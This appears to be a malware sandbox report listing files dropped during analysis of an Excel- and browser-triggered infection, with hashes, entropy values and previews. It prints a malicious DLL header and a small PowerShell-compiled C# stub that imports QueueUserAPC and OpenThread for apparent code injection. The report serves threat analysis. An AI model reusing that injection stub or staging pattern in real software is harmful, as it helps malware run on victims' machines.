MD5:	551D610AB28E2FA1D45F38FB17F165BB
SHA1:	CD94C081766B277A08DBDE62EA34B0E8EB73BA67
SHA-256:	150199FDE5CEF83225A5981568F73C2F9FA36E7D5D98C25A05FACCBC76D8E96C
SHA-512:	549D95DF5A43DD9CD9EA83D1FF40845215EB0CE69DC6C8E9B57221F3A8E7AFB41DCD43015016CBBF93B045E93BBB556A9F829992B0B1D7B375564952AB99AE1E
Malicious:	false
Preview:	AfdhH03IPvwpNbGUGQC3Sqo5nftVA9XNPzyOWIcbsqrtOYvIUZRP7OGoFvFbiojuaJshkPO9FgvlyWlUP4POkfsItsSdZ7MaI6aLX1F9mn0b72bpQLo1HjAAtwbQRB/7+TPhn2IVyA8On0We0655t+EPN78Bk/n78C6gsJXFqa+We0Ah/aKMl6xIxi6gEqXYyc7eMj2JlHjS2kHMLbc+n+hphZp+jGMg/TrkUqtZVCliq4owM71KsPfJq/R3ZHFnXecbMs4fW874IsPVTPBP6M+fquW72jimRji++xg7y59cq7j+2CWwoK7ncwwKl1LdR58jZFEZbD+bFrCctM+66Hu+K4GySCtWXrrLWZxDeWJtDldoF8/ldye6gCITZxtVcGDXmxX3FWhQ08HffwJl8AUSUMKNZrOjdSWOIU166fOcsq/iIXaZPPJ1iKiCYPc9ZfkPav/T5o4ZsHxrqVIKNqAhTOVcvsbVXAmVvLdTSRncHXOI7rI/mdGcsztfwIH567L7lXyRsvCSUyH+Zh5ym50wA8rFUFKyMJRhk2MlhS7R7fKCKIN9RLK/4qITqxRxhWUPfTiUKHQuxAT/BrXz8to2ig37LRZCQEPrz3VgpJXsvfFWOT/OM3KZUDKXbdHglEyHpg31qySzKLswxls3OQ6kBlfkd44a8sIHeCtXrWHmvdfiQtejcISo1AONzeEp3yyau5RKUqe/jX1JPNm9xz4bYjRuIKtz4vWJ0gjN0SXeOD5sD4C+jt7grroCuBOwB9/rdYwd+dpZ0QwO23TRlCDS1dQpQX6uesvdZol3fcHJBDNdAWHSGs5RhlTED5IMIftppJG6prcqTEpoYJsdzOReFRwruUISdsKcDUG2uwzqGLTPBeETf1CL3ln3CGgMRVTk4nDZXvutjofVVRnZn0X0Tsj3wrsuJm4EJdL6A4on23uuWHmuyxVdZlxi5EG9zDzU/jf7nFuEAq29Hl9x0gla362WFYAcsD/bs/NE

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\gWg[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2468
Entropy (8bit):	5.978095281262444
Encrypted:	false
SSDEEP:	48:N8EDibBvAI07bJm723rr7tnlAk4VHRGhNN/pZWpiQD9:BDibhi74723RyVHo4pia9
MD5:	08FF6EA95709ECCD2B18301DCA6EAD36
SHA1:	469301BA96736DCD6E881F50D86AF5320A75C26A
SHA-256:	F19D71EDF9EC0442F39B771CEC6C9A0BFBAA991C1CCA6EBF6E99CC1C0D827750
SHA-512:	9F0EE89A376FD13FCF4A5DA55EB4E1074716FDD4E43628934FF2CD2109531079E272736DB7DE4974FCB8F9ED525736A6DD894A36DC0B76D2D291077DCE91EA92
Malicious:	false
Preview:	b8vP5iKRQMXyuSLduapg3FvOfG97B3/iPAmgFtHhQxEvrE6USalvN5sld5GBeIyBBmrZcpYxV73hdLf6IYsc9vmYwguglsJmYg/BgNJZOfNVomvVx2X3wSxCBFpgwv0uMd1ES1xCpNgedd/mt59HIoemRFvW7uHQFameCPKv0cPTHBGulsWMDHkXor86UFIFT7mdcHKG6ip7sJGtlJQ8FPNKoVrbVcimTCEHHOwrMVFYXJL56pKBovuTbETyx3JgxqHeXEqwkXJCNnp5YwPAeuCTnm6zEZH7eInR8Xbp17+IJzfXoH1Xrw3YDRHIWzGENSQPHt1PJUJd4XP2cbjtyxLAn+4NbqG6fyYwtA7Ebt5FQVa/+94fdwmc3pDnfDUuHssLsCZqI895iFFVPLBlu6A3ro9yV5ITQt6WstG8Oe7obGZVQb0WCrn7qCl9LUKTHOJsry/5rLV4lh24Ef06YrVmD+veIkz1dEpjRuGVVaTWemWiVnygGaurzb3Mrz7VXr0xguANygoJ+EknhC89X2V3llS1hJlrnHA/J5m35BR+iBcC5S6UHklkwchOo/W5s7+ILbHvl9jPiflu9c5i/fhb6+n9neUXWoA6kjIfVfVUqRHsRLb1zCaVcuE/PZN0AUqFEJHaCFM3bkybaIwguSStZjRiSioGz3gczX2aZcr+1B2xxaj+/s2pV0lT/tvhskd6A0K5122voKIsmFEHlJQO4bzKHVHwtMLPc8VsqQ0P+EebqbhNnfqVo9jcDxtMdZufRgNUaabfEiJMYtLz/ZSMlmCCgtLscTBtk8rFYKZBRGIMM7lnrgGRNwet0stIzUuU6g1fJh8SWWaO6cvcp0zd7qXHr2roI8hN46/r/m3hJki7rvVjfadOOOY8/nsIsi5IPJjIisfywFGT5HhghHQodR3StUh+TUGfTO7C/pmsFgOVTop5kqAkOVJ8IrrW2qs98O7R33vTpDh9ad6cJV3seYLeWTDnAlf0DKrj

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\othn[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2468
Entropy (8bit):	5.978095281262444
Encrypted:	false
SSDEEP:	48:N8EDibBvAI07bJm723rr7tnlAk4VHRGhNN/pZWpiQD9:BDibhi74723RyVHo4pia9
MD5:	08FF6EA95709ECCD2B18301DCA6EAD36
SHA1:	469301BA96736DCD6E881F50D86AF5320A75C26A
SHA-256:	F19D71EDF9EC0442F39B771CEC6C9A0BFBAA991C1CCA6EBF6E99CC1C0D827750
SHA-512:	9F0EE89A376FD13FCF4A5DA55EB4E1074716FDD4E43628934FF2CD2109531079E272736DB7DE4974FCB8F9ED525736A6DD894A36DC0B76D2D291077DCE91EA92
Malicious:	false
Preview:	b8vP5iKRQMXyuSLduapg3FvOfG97B3/iPAmgFtHhQxEvrE6USalvN5sld5GBeIyBBmrZcpYxV73hdLf6IYsc9vmYwguglsJmYg/BgNJZOfNVomvVx2X3wSxCBFpgwv0uMd1ES1xCpNgedd/mt59HIoemRFvW7uHQFameCPKv0cPTHBGulsWMDHkXor86UFIFT7mdcHKG6ip7sJGtlJQ8FPNKoVrbVcimTCEHHOwrMVFYXJL56pKBovuTbETyx3JgxqHeXEqwkXJCNnp5YwPAeuCTnm6zEZH7eInR8Xbp17+IJzfXoH1Xrw3YDRHIWzGENSQPHt1PJUJd4XP2cbjtyxLAn+4NbqG6fyYwtA7Ebt5FQVa/+94fdwmc3pDnfDUuHssLsCZqI895iFFVPLBlu6A3ro9yV5ITQt6WstG8Oe7obGZVQb0WCrn7qCl9LUKTHOJsry/5rLV4lh24Ef06YrVmD+veIkz1dEpjRuGVVaTWemWiVnygGaurzb3Mrz7VXr0xguANygoJ+EknhC89X2V3llS1hJlrnHA/J5m35BR+iBcC5S6UHklkwchOo/W5s7+ILbHvl9jPiflu9c5i/fhb6+n9neUXWoA6kjIfVfVUqRHsRLb1zCaVcuE/PZN0AUqFEJHaCFM3bkybaIwguSStZjRiSioGz3gczX2aZcr+1B2xxaj+/s2pV0lT/tvhskd6A0K5122voKIsmFEHlJQO4bzKHVHwtMLPc8VsqQ0P+EebqbhNnfqVo9jcDxtMdZufRgNUaabfEiJMYtLz/ZSMlmCCgtLscTBtk8rFYKZBRGIMM7lnrgGRNwet0stIzUuU6g1fJh8SWWaO6cvcp0zd7qXHr2roI8hN46/r/m3hJki7rvVjfadOOOY8/nsIsi5IPJjIisfywFGT5HhghHQodR3StUh+TUGfTO7C/pmsFgOVTop5kqAkOVJ8IrrW2qs98O7R33vTpDh9ad6cJV3seYLeWTDnAlf0DKrj

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\K[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	328568
Entropy (8bit):	5.999873099768718
Encrypted:	false
SSDEEP:	6144:kQQVB8m8TrdrfMxd3T0vWpl4QeAH4zxTHaeNcUjGPja0ZIOFoIJC1YXqdFjwM2yP:kQCBN8HdrSl4vDQNmxT6eNJijTZIOFoV
MD5:	A2224302946ACCE38437F9307221542B
SHA1:	290E519A95F8AE7E4A00DAF1167B8B825D1573E3
SHA-256:	47232537A605E7A1384906C71CEF74BB1C2C532F2D0C1B54AF2FAC5346B9AB45
SHA-512:	FE148531D6BED8B200B67D082E375B2C563032756B6E0EC937A823D35B9B6ECF2C6A388CB9B89FC40623E27EA974E4AC6059989DF55BFEDB24CE294562C588F1
Malicious:	false
Preview:	S2NeOGZQ1zFjFVs5ON9QMQuEBWS4N1Hd87YEwxYicRQ49H2zRAXy0j8uIyf/VPLfj03RA8s5Iqeg1s8z0iBpp0iVUbvXc68CxC7D68i97wD/ZQH13VLEFbrqiJkekS4KxkLA+JcDmt9OSvob8atdEJMP8QsbhrsXL9gogdS8M5NHxNayRjQft5WHeO1d8TVipXxJhMEQITjU/aOefS6OVpgP7DBXCQwBQZ1att5gSCaWSEInSqWAf2IX/eITwsWrQ6L1L63BmVgXGKI9Uk/+HuwpBDrieiavGCR6y94E6GxJBSdo1XgjdC8O+Z5+f4BskiRfkZEKSIj0y3rcEtsrgUNPKMYCabnqxBfJwzttR6EHk8e05iuum5ucFb5iMUiUP2nhX42GIbTo/FbwuCIHLx4LI3MiiWJRhRIFOoQTak93tUy4HQIvLAS6DIFXg2Nv8b+dyogBFjVwT1EA1hU/GAwLlLhuTQlnQz6k5fA6DOKLEO2n4+276Zm768CHxc8lDWcGy+PeZhcw/hJ5vpH+0uwRCnCVIa4x4oyUn1J0eim3VMKdmvxuyAkybCIHrbFbCmg4ZUfInRsVXoBLyhiRyanAYNL7Z6o1aGn7QGEtjsJrWzZOinnNz+pT4iJ11Vpr+Urt195nZIFt9h2ROfIRRHeex/0bl99wmGwnDcLYxCIKwCE+gY851NtKqlL5YrS+3GOju7tdxUlubShUK6kT6g5IJgP4gdD4lnjngIvbY1viSNHsE6i0gBK9Ta6fEAXHFg1nvk7DVYP7tHYUI2SokrtxzuSdvixM1I21DSQPyNXRK1+S7b3meimpgVtwf14pJKmQm0e4ZOy8CdUIgIBGcgcvMyB/aUr+5Lz2TYJybGxxuYtFktr1Vgohr18aPPPatMgZlPxAWni7ExdPofIAyOp0ygpJR8AGgN3rKLHEu5QO8C/WRu/nKP2BVvNTwnX3b0WVWXiy2eTOJ7F0eBUQqfc7HqLULyv7RC6/jJ7C

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\UZ97[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	328568
Entropy (8bit):	5.999873099768718
Encrypted:	false
SSDEEP:	6144:kQQVB8m8TrdrfMxd3T0vWpl4QeAH4zxTHaeNcUjGPja0ZIOFoIJC1YXqdFjwM2yP:kQCBN8HdrSl4vDQNmxT6eNJijTZIOFoV
MD5:	A2224302946ACCE38437F9307221542B
SHA1:	290E519A95F8AE7E4A00DAF1167B8B825D1573E3
SHA-256:	47232537A605E7A1384906C71CEF74BB1C2C532F2D0C1B54AF2FAC5346B9AB45
SHA-512:	FE148531D6BED8B200B67D082E375B2C563032756B6E0EC937A823D35B9B6ECF2C6A388CB9B89FC40623E27EA974E4AC6059989DF55BFEDB24CE294562C588F1
Malicious:	false
Preview:	S2NeOGZQ1zFjFVs5ON9QMQuEBWS4N1Hd87YEwxYicRQ49H2zRAXy0j8uIyf/VPLfj03RA8s5Iqeg1s8z0iBpp0iVUbvXc68CxC7D68i97wD/ZQH13VLEFbrqiJkekS4KxkLA+JcDmt9OSvob8atdEJMP8QsbhrsXL9gogdS8M5NHxNayRjQft5WHeO1d8TVipXxJhMEQITjU/aOefS6OVpgP7DBXCQwBQZ1att5gSCaWSEInSqWAf2IX/eITwsWrQ6L1L63BmVgXGKI9Uk/+HuwpBDrieiavGCR6y94E6GxJBSdo1XgjdC8O+Z5+f4BskiRfkZEKSIj0y3rcEtsrgUNPKMYCabnqxBfJwzttR6EHk8e05iuum5ucFb5iMUiUP2nhX42GIbTo/FbwuCIHLx4LI3MiiWJRhRIFOoQTak93tUy4HQIvLAS6DIFXg2Nv8b+dyogBFjVwT1EA1hU/GAwLlLhuTQlnQz6k5fA6DOKLEO2n4+276Zm768CHxc8lDWcGy+PeZhcw/hJ5vpH+0uwRCnCVIa4x4oyUn1J0eim3VMKdmvxuyAkybCIHrbFbCmg4ZUfInRsVXoBLyhiRyanAYNL7Z6o1aGn7QGEtjsJrWzZOinnNz+pT4iJ11Vpr+Urt195nZIFt9h2ROfIRRHeex/0bl99wmGwnDcLYxCIKwCE+gY851NtKqlL5YrS+3GOju7tdxUlubShUK6kT6g5IJgP4gdD4lnjngIvbY1viSNHsE6i0gBK9Ta6fEAXHFg1nvk7DVYP7tHYUI2SokrtxzuSdvixM1I21DSQPyNXRK1+S7b3meimpgVtwf14pJKmQm0e4ZOy8CdUIgIBGcgcvMyB/aUr+5Lz2TYJybGxxuYtFktr1Vgohr18aPPPatMgZlPxAWni7ExdPofIAyOp0ygpJR8AGgN3rKLHEu5QO8C/WRu/nKP2BVvNTwnX3b0WVWXiy2eTOJ7F0eBUQqfc7HqLULyv7RC6/jJ7C

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\app[1].dll Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	455680
Entropy (8bit):	6.751938575699122
Encrypted:	false
SSDEEP:	12288:AmYDWUbdfyU+H93bJ3aBGQIuSR35F5VBpx:yBbdfJsJqBG5VB/
MD5:	F3BE390B01C85970DEEAE124CA36CE2D
SHA1:	93114ECF1B2C711EC10E1FAFDC834393EFC11A97
SHA-256:	4EEF8B6A5BCD808CD0AB0E33EFCEA2C2F9A36ABE556E56556DE8550383C9D3CE
SHA-512:	463829E0A07A2983D967483D49DD478243658C0BE583BCDDB801CD45BEB869EEE8CDA812EA3A74E5CF5D70BE07B5A59677317DBADCEFDB8A21DE3DDCBE7FA3A6
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S....z.X.z.X.z.XL..Y.z.XL..Y.z.XL..Y.z.X...Y.z.X...Y.z.X...Y6z.X..kX.z.X.z.Xcz.X...Y.z.X...Y.z.X...Y.z.XRich.z.X................PE..L......^...........!................7.....................................................@.................................@................................p...#......T........................... ...@............................................text............................... ..`.rdata..p...........................@..@.data...............................@....reloc...#...p...$..................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	89
Entropy (8bit):	4.594574127566828
Encrypted:	false
SSDEEP:	3:oVXUxKsMTRb8JOGXnExKsMTRwCn:o9U8rqE8gC
MD5:	3D41A434776BF18F4210264D55425F2A
SHA1:	FFF512CDEBF629DD6422C86A3EDA890EEA27C7E7
SHA-256:	F3C52FF6CB2E9DF7C07F0C6EFA7335C1CF041183DFBFB07065597733554F4E7B
SHA-512:	10BA8CCC4F234C64B9EBD807FACC2C2FFE7CA1D8CA82E5059BE5408738F9E92B18DD2B19DEEE9730D544CE40A005C0D95BACB095A77569C2931D42E4B9C6F45B
Malicious:	false
Preview:	[2021/07/08 15:47:34.648] Latest deploy version: ..[2021/07/08 15:47:34.648] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iu1bwi3u.hs4.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqu4u5sp.pln.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pfa1axxq.cvf.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xm5ssgy3.k4v.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	396
Entropy (8bit):	4.9841648897335995
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJGa7mMRSR7a12P5JSSRa+rVSSRnA/fDDQy:V/DTLDfucaA3xv9rV5nA/HQy
MD5:	AFB1799F1AEBC489A9583C7CF3EABC87
SHA1:	BF47182925DED6BD7A35E2EA57C44C4B5D28CDAD
SHA-256:	AF6E88061E474FF75EE21A0521844D64DE10EFF291A6D4C7AB4850D9166F0F98
SHA-512:	9D9A5B9C8CD76E3F3C97B6060D5B3AD2129FFA34ECAF8C78559D53D25F749DF254A6872E878D8CE032B33B353804B3587DD7890EE5C10820E67EC0CF8676C5B2
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class susrkisij. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr ajmlxynp,IntPtr pgoq,IntPtr qtbri);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint nrr,uint kxj,IntPtr rmmfwi);.. }..}.

C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.267867671414711
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fsXnsUzxs7+AEszIWXp+N23fsXn6:p37Lvkmb6KHUXnsUWZE8UXn6
MD5:	CEEDB7C51F915816EBDA2EC610D66C71
SHA1:	8237138597D4F9FB2EC14242EF6974D1366AFB76
SHA-256:	31FFD039D190821F2C61A674FB875D083BCDE9631235376F81F5C27688583FFB
SHA-512:	7101BEBFAFAF862A0F0341864802AA6B12DC7E5D5A95545C519838E79242BD941AF6A1D5B4E3D425ACC0403144D215A76F8DAFF24C676AA7847085693A210E26
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.0.cs"

C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.out Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	modified
Size (bytes):	454
Entropy (8bit):	5.38028381091174
Encrypted:	false
SSDEEP:	6:IM7mLAA9VwRhMuAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fsXnsUzxs7+AEsz+:xKIR37Lvkmb6KHUXnsUWZE8UXnn
MD5:	A14AD1BA111418248D596DB485C0A5FC
SHA1:	8ED521CF791C4922C15B803DE64DC219897BC81E
SHA-256:	306B8FCCFA6D2C04DD5493DF9EDA6695772DE2EEAD0DACC0274C07A27C749F57
SHA-512:	032F5CAE351024E685DA3E47B0B50EA909F6C2580F6585173EC3669194C9B3BC3808419B15729613E7DA5EB2080D80EFB5617BEF749DEFA97C732CD67DDE91D9
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.0.cs"......

C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	396
Entropy (8bit):	4.9841648897335995
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJGa7mMRSR7a12P5JSSRa+rVSSRnA/fDDQy:V/DTLDfucaA3xv9rV5nA/HQy
MD5:	AFB1799F1AEBC489A9583C7CF3EABC87
SHA1:	BF47182925DED6BD7A35E2EA57C44C4B5D28CDAD
SHA-256:	AF6E88061E474FF75EE21A0521844D64DE10EFF291A6D4C7AB4850D9166F0F98
SHA-512:	9D9A5B9C8CD76E3F3C97B6060D5B3AD2129FFA34ECAF8C78559D53D25F749DF254A6872E878D8CE032B33B353804B3587DD7890EE5C10820E67EC0CF8676C5B2
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class susrkisij. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr ajmlxynp,IntPtr pgoq,IntPtr qtbri);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint nrr,uint kxj,IntPtr rmmfwi);.. }..}.

C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.22358074629342
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fIT4x0zxs7+AEszIWXp+N23fIT4DH:p37Lvkmb6KHcWZE8ZHn
MD5:	5861E4F177E993C70FC9E148D834D688
SHA1:	7E787C9CA4A454AF88BAA1BE98083B81D08355F8
SHA-256:	F7B8EEAB6FBB19C838CAFAEB2CDF6850ED1A190E840F6BA1146FDC7BEB813D38
SHA-512:	CEA11D2A215E232AEB9A3BD6E37E5709E17F88DD0F8A5E7D95FB9EC42CB6AA853AC4E014D7C37CE3C190A5AB5B6FB5D123D06B8FFAE4545D704EB2CDB6E04462
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.0.cs"

C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.out Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	modified
Size (bytes):	454
Entropy (8bit):	5.360834939406208
Encrypted:	false
SSDEEP:	6:IM7mLAA9VwRhMuAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fIT4x0zxs7+AEszO:xKIR37Lvkmb6KHcWZE8ZH+
MD5:	2871DCAC841DB5BE9CE399BB6B760857
SHA1:	23F0ACB68C09E4CFBA7C15567BEEEB67F2D3F69B
SHA-256:	1856A0F7CA9DA06E3429B6730EABF243591BF467B9B86674777121858FF9211A
SHA-512:	7A5047AED02EECE3FBE737EA84D20C2D5DC1F633166B2673DB716A4ECAD61D7DDBBEEA0771DBC22B49CCD5A073FAB9275657F63852FF39A7B04AB60B80E36BBD
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.0.cs"......

C:\Users\user\AppData\Local\Temp\~DF2EB1C9CA29BD00CF.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	14245
Entropy (8bit):	1.1113575184431475
Encrypted:	false
SSDEEP:	96:kBqoIci6q01eTedvHX4xH28A6AQsq97qJlA:kBqoIci8D4NWA
MD5:	C4B1F31EB96AEA043348A0005402FD3A
SHA1:	068F3619FD0F74CA21221B3E2EBD54BB881BCB94
SHA-256:	824ADFF0D18A52F9B8811BD5866ADD4F0855E6A03B77CF88C9A0479362650383
SHA-512:	5B09B24F1B834FA33B04F2F647DDDEE7ED70C435D3AD11BA8AA886A8A12245B65029947AC8A1263458133CD9CD667CAEC2F469D2B2073502F2F233973B26CD8D
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF436C4ACF406520B7.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40169
Entropy (8bit):	0.6758992421665342
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+bVHuVkrdTY5ArdTY5brdTY58:kBqoxKAuqR+bVHuVkNMANMbNM8
MD5:	98FABC5D4AA9C8A1CBA8966AB226FC9B
SHA1:	BFDCB96E44BDB4F82E60DD429C64A27B752A2793
SHA-256:	119EA23EEBD7433269B0ED395AF2CE42551097E1EBA9F3D2099C42DBC30411AA
SHA-512:	010B3CB1FF1AA3792060D12EC33D459779891F33B0AD57E46C0C6FA7AA5683D7C7E30EF89CCAD9E10C771849750D739500343B733F572488558321CE13F0379C
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF4AB9BBFB5CFFE773.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40169
Entropy (8bit):	0.6743248643482478
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+tzxQTmnXN2l9SonXN2l9SDnXN2l9Sk:kBqoxKAuqR+tzxQTmXUyoXUyDXUyk
MD5:	5A19002C8E15DBFE531737D2D37682E6
SHA1:	164D5BCBC8EB0C75690BAB805A8F24212895DEC3
